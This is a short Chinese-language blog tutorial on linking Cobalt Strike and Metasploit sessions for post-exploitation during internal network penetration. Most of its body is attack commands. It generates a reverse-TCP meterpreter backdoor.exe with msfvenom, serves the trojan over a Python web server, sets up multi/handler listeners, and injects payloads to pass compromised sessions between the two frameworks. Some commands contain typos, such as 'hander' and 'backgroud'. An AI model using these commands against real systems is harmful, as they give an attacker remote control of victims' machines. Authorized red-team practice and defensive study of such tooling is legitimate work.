Cobalt Strike 与 MSF 联动

使用Cobalt Strike生成的会话和MSF相互连接,在内网渗透中,可以方便后期的渗透。

一、Cobalt Strike连接MSF会话

1. 上线msf会话

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.0.106 lport=4422 -f exe > backdoor.exe

img

2. python开启web服务,下载木马

python3 -m http.server 80

img

3. msf进行监听模式

msfconsole
use exploit/multi/hander
set payload windows/meterpreter/reverse_tcp
set lhost 10.10.10.128
set lport 4444
run

运行木马反弹shell
img

4. 开启Cobalt Strike

./teamserver 10.10.10.128 123456

客户端连接后,添加一个监听
img

5. 会话转移到CS上

backgroud
use exploit/window/local/payload_inject
set payload windows/meterpreter/reverse_http
set lhost 10.10.10.128
set lport 8888
set DisablePayloadHandler True
set PrependMigrate True
sessions -l
set session 1
run

img
img

二、MSF连接Cobalt Strike会话

1. 添加一个监听,生成一个木马程序
img

img

2. 重新添加一个监听器
img

3. 会话转义到MSF

msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_http
set lport 9999
set lhost 0.0.0.0
exploit

img
img

posted @   kalixcn  阅读(169)  评论(0编辑  收藏  举报
相关博文:
阅读排行:
· DeepSeek 开源周回顾「GitHub 热点速览」
· 物流快递公司核心技术能力-地址解析分单基础技术分享
· .NET 10首个预览版发布:重大改进与新特性概览!
· AI与.NET技术实操系列(二):开始使用ML.NET
· 单线程的Redis速度为什么快?
点击右上角即可分享
微信分享提示